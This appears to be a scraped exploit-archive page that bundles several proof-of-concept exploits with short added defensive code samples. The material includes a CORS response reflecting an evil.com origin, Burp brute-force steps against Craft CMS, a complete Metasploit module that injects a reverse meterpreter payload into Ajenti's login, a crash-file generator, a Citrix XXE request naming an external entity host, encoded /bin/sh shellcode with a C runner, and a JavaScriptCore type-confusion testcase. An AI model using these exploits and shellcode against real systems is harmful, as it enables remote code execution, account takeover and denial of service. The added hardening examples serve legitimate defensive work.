Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
Allow: GET
Access-Control-Allow-Origin: https://www.evil.com
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
Vary: Origin,Accept-Encoding,User-Agent
Keep-Alive: timeout=2, max=73
Connection: Keep-Alive
Content-Type: application/json; charset=UTF-8
Original-Content-Encoding: gzip
Content-Length: 158412
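
As an added example (not from the advisory or from WordPress itself), a Python check that classifies a response's CORS headers for the Origin that was sent, next to the hardened behaviour of echoing an origin only from an allow-list. The response headers are constructed from the exchange above; https://example.com stands in for [Your-Domain].

```python
from typing import Dict, List, Set

# Trusted first-party origins; in production this is the site's own origin(s).
# "https://example.com" is a placeholder standing in for [Your-Domain].
TRUSTED_ORIGINS: Set[str] = {"https://example.com"}

# Constructed from the response in the advisory: only the CORS-relevant headers.
SAMPLE_RESPONSE_HEADERS: Dict[str, str] = {
    "Access-Control-Allow-Origin": "https://www.evil.com",
    "Access-Control-Allow-Methods": "OPTIONS, GET, POST, PUT, PATCH, DELETE",
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin,Accept-Encoding,User-Agent",
}


def assess_cors(request_origin: str, headers: Dict[str, str], trusted: Set[str]) -> List[str]:
    """Classify a response's CORS headers for the Origin that was sent. Returns
    human-readable issues; an empty list means the response is safe for that origin."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    issues: List[str] = []
    if acao is None:
        return issues  # no cross-origin access granted at all
    if acao == "*":
        if creds:
            issues.append("wildcard origin combined with Allow-Credentials: true")
    elif acao == request_origin and request_origin not in trusted:
        issues.append("untrusted Origin reflected: %s" % acao)
        if creds:
            issues.append("cookies/credentials usable cross-origin by %s" % acao)
    if "origin" not in h.get("vary", "").lower():
        issues.append("Vary: Origin missing; a shared cache could replay the ACAO value")
    return issues


def cors_headers_for(request_origin: str, trusted: Set[str]) -> Dict[str, str]:
    """Hardened behaviour: echo the Origin only when it is on the allow-list and
    always vary on Origin; any other origin gets no CORS headers at all."""
    if request_origin not in trusted:
        return {}
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


if __name__ == "__main__":
    for issue in assess_cors("https://www.evil.com", SAMPLE_RESPONSE_HEADERS, TRUSTED_ORIGINS):
        print("[!] " + issue)
```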

Craft CMS Rate Limiting / Brute Force


Craft CMS versions up to 3.1.7 are missing rate limiting on password validations.


MD5 | 20a945b5a9341d9bb8431f7153be5809

# Exploit Title : Craft CMS up to 3.1.7 Password Prompt Form Lockout weak authentication
# Author [Discovered By] : Mohammed Abdul Raheem
# Author's [Company Name] : TrekShield IT Solution Private Limited
# Author [Exploit-db] : https://www.exploit-db.com/?author=9783
# Found Vulnerability On : 16-01-2019
# Vendor Homepage:https://craftcms.com/
# Software Information Link: https://github.com/craftcms/demo
# Software Affected Versions : CraftCms up to v3.1.7
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : No Rate Limit implemented on Sensitive Actions
# CVE : CVE-2019-15929
####################################################################

# Description about Software :
***************************
Craft is a flexible, user-friendly CMS for creating custom digital
experiences on the web and beyond.

####################################################################

# Vulnerability Description :
*****************************

In CraftCMS up to v3.1.7 the elevated session password prompt was not
rate limited like the normal login forms: the other sensitive actions
were rate limited, but rate-limit protection was never implemented on
the change-password form, leaving it open to brute-force attempts to
guess the password.


# Impact :
***********
This impacts confidentiality. An attacker has the possibility of
changing an account's password through a brute-force attack.

# Steps To Validate :
*********************

1. Login to CraftCMS account.
2. Go to https://demo.craftcms.com/<Token-Here>/s/admin/myaccount/
3. Enter New Password and click save
4. Application will ask to enter Current Password.
5. Enter random Password and capture the request with Burp > send to
intruder > start attack with payloads you want.

# ATTACHED POC :
****************

[image: image.png]

# More Information Can be find here :
*************************************
https://github.com/craftcms/cms/blob/develop/CHANGELOG-v3.md#security-5

###################################################################

# Discovered By Mohammed Abdul Raheem from TrekShield.com
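
The gap described above is one password form left outside the rate limiting the other forms had. As an added example (not Craft's own implementation), a Python lockout gate keyed on the account rather than on the endpoint, so the login form, the elevated-session prompt and the change-password form all share one failure counter; the thresholds and the FakeClock are constructed for the demonstration.

```python
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict


class PasswordAttemptLimiter:
    """One lockout gate shared by every form that verifies a password: the
    login form, the elevated-session prompt and the change-password form.
    Keying on the account (not the endpoint) is what closes the gap above."""

    def __init__(self, max_failures: int = 5, window_s: int = 300,
                 lockout_s: int = 900, clock: Callable[[], float] = time.monotonic):
        self.max_failures = max_failures
        self.window_s = window_s
        self.lockout_s = lockout_s
        self.clock = clock
        self._failures: Dict[str, Deque[float]] = defaultdict(deque)
        self._locked_until: Dict[str, float] = {}

    def _prune(self, account: str, now: float) -> None:
        q = self._failures[account]
        while q and now - q[0] > self.window_s:
            q.popleft()

    def allowed(self, account: str) -> bool:
        """Call before checking the supplied password on ANY password form."""
        now = self.clock()
        if self._locked_until.get(account, 0.0) > now:
            return False
        self._prune(account, now)
        return len(self._failures[account]) < self.max_failures

    def record(self, account: str, success: bool) -> None:
        """Call after the password check; a success clears the counter."""
        now = self.clock()
        if success:
            self._failures.pop(account, None)
            self._locked_until.pop(account, None)
            return
        q = self._failures[account]
        q.append(now)
        self._prune(account, now)
        if len(q) >= self.max_failures:
            self._locked_until[account] = now + self.lockout_s


class FakeClock:
    """Constructed clock so the demonstration does not have to sleep."""

    def __init__(self, start: float = 0.0):
        self.now = start

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds


if __name__ == "__main__":
    clock = FakeClock()
    gate = PasswordAttemptLimiter(max_failures=3, window_s=60, lockout_s=120, clock=clock)
    for form in ("login", "login", "elevated-session"):
        print("%s: attempt allowed=%s" % (form, gate.allowed("admin")))
        gate.record("admin", success=False)  # wrong password each time
    print("change-password: attempt allowed=%s" % gate.allowed("admin"))
```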


Ajenti 2.1.31 Remote Code Execution


This Metasploit module exploits a command injection vulnerability in Ajenti versions 2.1.31 and below. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.


MD5 | 719bfa6b19301442411362d61d7c3263

# Exploit Title: Ajenti 2.1.31 - Remote Code Execution (Metasploit)
# Date: 2019-10-29
# Exploit Author: Onur ER
# Vendor Homepage: http://ajenti.org/
# Software Link: https://github.com/ajenti/ajenti
# Version: 2.1.31
# Tested on: Ubuntu 19.10

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => "Ajenti 2.1.31 Remote Code Execution",
      'Description' => %q{
        This module exploits a command injection in Ajenti <= 2.1.31.
        By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
      },
      'Author' => [
        'Jeremy Brown', # Vulnerability discovery
        'Onur ER <onur@onurer.net>' # Metasploit module
      ],
      'References' => [
        ['EDB', '47497']
      ],
      'DisclosureDate' => '2019-10-14',
      'License' => MSF_LICENSE,
      'Platform' => 'python',
      'Arch' => ARCH_PYTHON,
      'Privileged' => false,
      'Targets' => [
        [ 'Ajenti <= 2.1.31', {} ]
      ],
      'DefaultOptions' =>
        {
          'RPORT' => 8000,
          'SSL' => 'True',
          'payload' => 'python/meterpreter/reverse_tcp'
        },
      'DefaultTarget' => 0
    ))
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => "/view/login/normal"
    })
    if res and res.code == 200
      if res.body =~ /'ajentiVersion', '2.1.31'/
        return Exploit::CheckCode::Vulnerable
      elsif res.body =~ /Ajenti/
        return Exploit::CheckCode::Detected
      end
    end
    vprint_error("Unable to determine due to a HTTP connection timeout")
    return Exploit::CheckCode::Unknown
  end


  def exploit
    print_status("Exploiting...")
    random_password = rand_text_alpha_lower(7)
    json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
                  'password' => random_password,
                  'mode' => 'normal'
                }
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),
      'ctype' => 'application/json',
      'data' => JSON.generate(json_body)
    })
  end
end

WMV To AVI MPEG DVD WMV Converter 4.6.1217 Denial Of Service


WMV to AVI MPEG DVD WMV Converter version 4.6.1217 suffers from a denial of service vulnerability.


MD5 | fe0e90ffad1e81d90bb940f672daceb2

# Exploit Title: WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Denial of Service
# Date: 2019-10-30
# Vendor Homepage:https://www.alloksoft.com/
# Software Link: https://www.alloksoft.com/wmv.htm
# Exploit Author: Nithoshitha S
# Tested Version: v4.6.1217
# Tested on: Windows 7 x64
# Windows XP SP3

# 1.- Run python code :poc.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open WMV to AVI MPEG DVD WMV Converter and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
# 5.- Click 'OK' and you will see a crash.

# poc.py

#!/usr/bin/env python
# Writes a 6000-byte run of 'A' to Evil.txt for the steps above.
buffer = "\x41" * 6000

try:
    f = open("Evil.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")

Citrix StoreFront Server 7.15 XML Injection


Citrix StoreFront Server version 7.15 suffers from an XML external entity injection vulnerability.


MD5 | 6f5c1fba04bb7a0d33f77002aebcad77

# Exploit Title: Citrix StoreFront Server 7.15 - XML External Entity Injection
# Date: 2019-08-28
# Exploit Author: Vahagn Vardanya
# Vendor Homepage:https://www.citrix.com/downloads/storefront/
# Software Link: https://support.citrix.com/article/CTX251988
# Version:
# Citrix StoreFront Server earlier than 1903
# Citrix StoreFront Server 7.15 LTSR earlier than CU4 (3.12.4000)
# Citrix StoreFront Server 7.6 LTSR earlier than CU8 (3.0.8000)
# Tested on: Windows
# Shodan query https://www.shodan.io/search?query=%2FCitrix%2FStoreWeb

# PoC

POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1
Content-Type: application/vnd.citrix.requesttoken+xml
Accept: application/vnd.citrix.requesttokenresponse+xml, application/vnd.citrix.authenticateresponse-1+xml
Accept-Language:ru,en-US;q=0.9,en;q=0.8,fr;q=0.7,hy;q=0.6,de;q=0.5,es;q=0.4,nb;q=0.3,nl;q=0.2,fi;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
X-Forwarded-For: 192.168.204.1
X-Citrix-Agent: crm.
X-Citrix-AM-CredentialTypes: none, username, domain, password, newpassword,passcode, savecredentials, textcredential, webview, webview
X-Citrix-AM-LabelTypes: none, plain, heading, information, warning, error,confirmation, image
X-Citrix-IsUsingHTTPS: No
Host: 192.168.204.131
Content-Length: 331
Expect: 100-continue

<?xml version="1.0" encoding="utf-8" standalone='no'?><!DOCTYPE requesttoken [<!ENTITY % xxe SYSTEM "http://REMOTE">%xxe; ]><requesttoken xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken"><for-service>a</for-service><for-service-url>http://192.168.204.146/Citrix/store_nameAuth/auth/v1/token</for-service-url><reqtokentemplate /><requested-lifetime>0.08:00:00</requested-lifetime></requesttoken>
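
The PoC works because the server's XML parser honours a DOCTYPE with an external parameter entity. As an added example (not Citrix code), a Python parser for the requesttoken body that installs expat's doctype and entity-declaration callbacks to refuse any DTD before an external reference could be resolved; both request bodies are constructed from the PoC above, with 192.0.2.10 as a placeholder host and "http://REMOTE" kept as the advisory's placeholder.

```python
import xml.parsers.expat
from typing import Dict, List


class UnsafeXml(ValueError):
    """Raised when a request body carries a DTD or an entity declaration."""


# Constructed requesttoken body in the shape of the PoC above, without a DTD.
SAFE_BODY = (
    b'<?xml version="1.0" encoding="utf-8"?>'
    b'<requesttoken xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken">'
    b'<for-service>a</for-service>'
    b'<for-service-url>http://192.0.2.10/Citrix/Store/auth/v1/token</for-service-url>'
    b'<reqtokentemplate /><requested-lifetime>0.08:00:00</requested-lifetime>'
    b'</requesttoken>'
)

# The same body with the parameter-entity DOCTYPE from the PoC in front of it.
XXE_BODY = (
    b'<?xml version="1.0" encoding="utf-8" standalone="no"?>'
    b'<!DOCTYPE requesttoken [<!ENTITY % xxe SYSTEM "http://REMOTE">%xxe; ]>'
    + SAFE_BODY.split(b'?>', 1)[1]
)


def parse_requesttoken(body: bytes) -> Dict[str, str]:
    """Parse a requesttoken into {element: text}, refusing any DOCTYPE or entity
    declaration before the parser ever considers resolving it. Exceptions raised
    inside expat callbacks propagate out of Parse(), which is what stops it."""
    parser = xml.parsers.expat.ParserCreate()
    fields: Dict[str, str] = {}
    open_elements: List[str] = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml("DOCTYPE %r not accepted in request bodies" % name)

    def on_entity(*_):
        raise UnsafeXml("entity declarations not accepted in request bodies")

    def on_start(name, attrs):
        open_elements.append(name)
        fields.setdefault(name, "")

    def on_end(name):
        open_elements.pop()

    def on_text(data):
        if open_elements:
            fields[open_elements[-1]] += data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(body, True)
    return fields


if __name__ == "__main__":
    print(parse_requesttoken(SAFE_BODY))
    try:
        parse_requesttoken(XXE_BODY)
    except UnsafeXml as e:
        print("rejected: %s" % e)
```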

Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) Null Free Shellcode


47 bytes small Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) null free shellcode.


MD5 | a9113f7b013779f563b04b416050d879

# Title: Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
# Author: Daniel Ortiz
# Date: 2019-10-30
# Tested on: Linux 4.18.0-25-generic #26 Ubuntu
# Size: 47 bytes
# SLAE ID: PA-9844

#----------------------- execve ------------------------------------------------#

global _start

section .text

_start:

xor eax, eax
push eax

; PUSH //bin/sh (8 bytes)

push 0x68732f2f
push 0x6e69622f
mov ebx, esp

push eax
mov edx, esp

push ebx
mov ecx, esp

mov al, 11
int 0x80

#------------------------ execve shellcode -------------------------------------#

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

#----------------------- Python Encoder ----------------------------------------#

#!/usr/bin/python

# bytes literal so the script runs under both Python 2 and 3
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

encoded = ""
encoded2 = ""

rot = 8

print('Encoded shellcode ...')

for x in bytearray(shellcode):
    # NOT encoding
    y = ~x

    # ROT 8 encoding
    h = (y + rot) % 256

    # \x.. form for a C/Python string
    encoded += '\\x'
    encoded += '%02x' % (h & 0xff)

    # 0x.. form for the NASM db line
    encoded2 += '0x'
    encoded2 += '%02x,' % (h & 0xff)


print(encoded)

print(encoded2)

print('Len: %d' % len(bytearray(shellcode)))

#---------------------- Assembly Code ------------------------------------------#


global _start

section .text
_start:
jmp short call_shellcode

decoder:
pop esi
xor ecx, ecx
mov cl, 25


decode:

sub byte [esi], 8
not byte [esi]
inc esi
loop decode

jmp short EncodedShellcode

call_shellcode:

call decoder

EncodedShellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87

#------------------------- final shellcode ----------------------------------------#

unsigned char buf[] =


"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe"
"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff"
"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a"
"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8"
"\x13\x88";

#------------------------- C wrapper --------------------------------------------------#

#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe"
"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff"
"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a"
"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8"
"\x13\x88";

int main()
{
    printf("Shellcode Length: %d\n", (int)strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
}

JavaScriptCore GetterSetter Type Confusion


JavaScriptCore (JSC) GetterSetter suffers from a type confusion vulnerability during DFG compilation.


MD5 | 63f1952a7a692ab451a162d31ee902ed

JSC: GetterSetter type confusion during DFG compilation

The following JavaScript program, found by Fuzzilli and slightly modified, crashes JavaScriptCore built from HEAD and the current stable release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc):

let notAGetterSetter = {whatever: 42};

function v2(v5) {
    const v10 = Object();
    if (v5) {
        const v12 = {set:Array};
        const v14 = Object.defineProperty(v10,"length",v12);
        const v15 = (140899729)[140899729];
    } else {
        v10.length = notAGetterSetter;
    }
    const v18 = new Uint8ClampedArray(49415);
    v18[1] = v10;
    const v19 = v10.length;
    let v20 = 0;
    while (v20 < 100000) {
        v20++;
    }
}
const v26 = v2();
for (let v32 = 0; v32 < 1000; v32++) {
    const v33 = v2(true);
}

/*
Crashes with:
ASSERTION FAILED: from.isCell() && from.asCell()->JSCell::inherits(*from.asCell()->vm(), std::remove_pointer<To>::type::info())
../../Source/JavaScriptCore/runtime/JSCast.h(44) : To JSC::jsCast(JSC::JSValue) [To = JSC::GetterSetter *]
1 0x1111ada79 WTFCrash
2 0x1111ada99 WTFCrashWithSecurityImplication
3 0x10ffb8f55 JSC::GetterSetter* JSC::jsCast<JSC::GetterSetter*>(JSC::JSValue)
4 0x10ffaf820 JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::executeEffects(unsigned int, JSC::DFG::Node*)
5 0x10ff9f37b JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::execute(unsigned int)
6 0x10ff9def2 JSC::DFG::CFAPhase::performBlockCFA(JSC::DFG::BasicBlock*)
7 0x10ff9d957 JSC::DFG::CFAPhase::performForwardCFA()
8 0x10ff9d647 JSC::DFG::CFAPhase::run()
9 0x10ff9cc61 bool JSC::DFG::runAndLog<JSC::DFG::CFAPhase>(JSC::DFG::CFAPhase&)
10 0x10ff6c65b bool JSC::DFG::runPhase<JSC::DFG::CFAPhase>(JSC::DFG::Graph&)
11 0x10ff6c625 JSC::DFG::performCFA(JSC::DFG::Graph&)
12 0x110279031 JSC::DFG::Plan::compileInThreadImpl()
13 0x110274fa6 JSC::DFG::Plan::compileInThread(JSC::DFG::ThreadData*)
14 0x11052a9bb JSC::DFG::Worklist::ThreadBody::work()
15 0x1111b3c69 WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0::operator()() const
16 0x1111b38a9 WTF::Detail::CallableWrapper<WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0, void>::call()
17 0x1102c433a WTF::Function<void ()>::operator()() const
18 0x1111f0350 WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*)
19 0x111285525 WTF::wtfThreadEntryPoint(void*)
20 0x7fff5a7262eb _pthread_body
21 0x7fff5a729249 _pthread_start
22 0x7fff5a72540d thread_start
*/

The assertion indicates that a JSCell is incorrectly downcasted to a GetterSetter [1] (a pseudo object used to implement property getters/setter). In non debug builds, a type confusion then follows.

Below is my preliminary analysis of the cause of the bug.

The function v2 is eventually JIT compiled by the FTL JIT compiler. Initially, it will create the following (pseudo) DFG IR for it:

# Block 0 (before if-else):
44: NewObject(...)
<jump to block 1 or 2 depending on v5>

# Block 1 (the if part):
... <install .length property on @44>
// Code for const v15 = (140899729)[140899729];
ForceOSRExit
Unreachable

# Block 2 (the else part)
PutByOffset @44, notAGetterSetter
PutStructure

# Block 3 (after the if-else):
...
// Code for v10.length. Due to feedback from previous executions, DFG
// JIT speculates that the if branch will be taken and that it will see
// v10 with a GetterSetter for .length here
CheckStructure @44, structureWithLengthBeingAGetterSetter
166: GetGetterSetterByOffset @44, .length // Load the GetterSetter object from @44
167: GetGetter @166 // Load the getter function from the GetterSetter
...


Here, the end of block 1 has already been marked as unreachable due to the element load from a number which will always cause a bailout.

Later, the global subexpression elimination phase [2] runs and does the following (which can be seen by enabling verbose CSE [3]):

* It determines that the GetGetterSetterByOffset node loads the named property from the object @44
* It determines that this property slot is assigned in block 2 (the else block) and that this block strictly dominates the current block (meaning that the current block can only be reached through block 2)
* This is now the case as block 1 does a bailout, so block 3 can never be reached from block 1
* As such, CSE replaces the GetGetterSetterByOffset operation with the constant for |notAGetterSetter| (as that is what is assigned in block 2).

At this point the IR is incorrect as the input to a GetGetter operation is expected to be a GetterSetter object, but in this case it is not. During later optimizations, e.g. the AbstractInterpreter relies on that invariant and casts the input to a GetterSetter object [4]. At that point JSC crashes in debug builds with the above assertion. It might also be possible to trigger the type confusion at runtime instead of at compile time but I have not attempted that.

Please note: this bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.


[1] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/runtime/GetterSetter.h#L43
[2] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.h#L49
[3] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.cpp#L51
[4] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L2811


Related CVE Numbers: CVE-2019-8765.



Found by: saelo@google.com

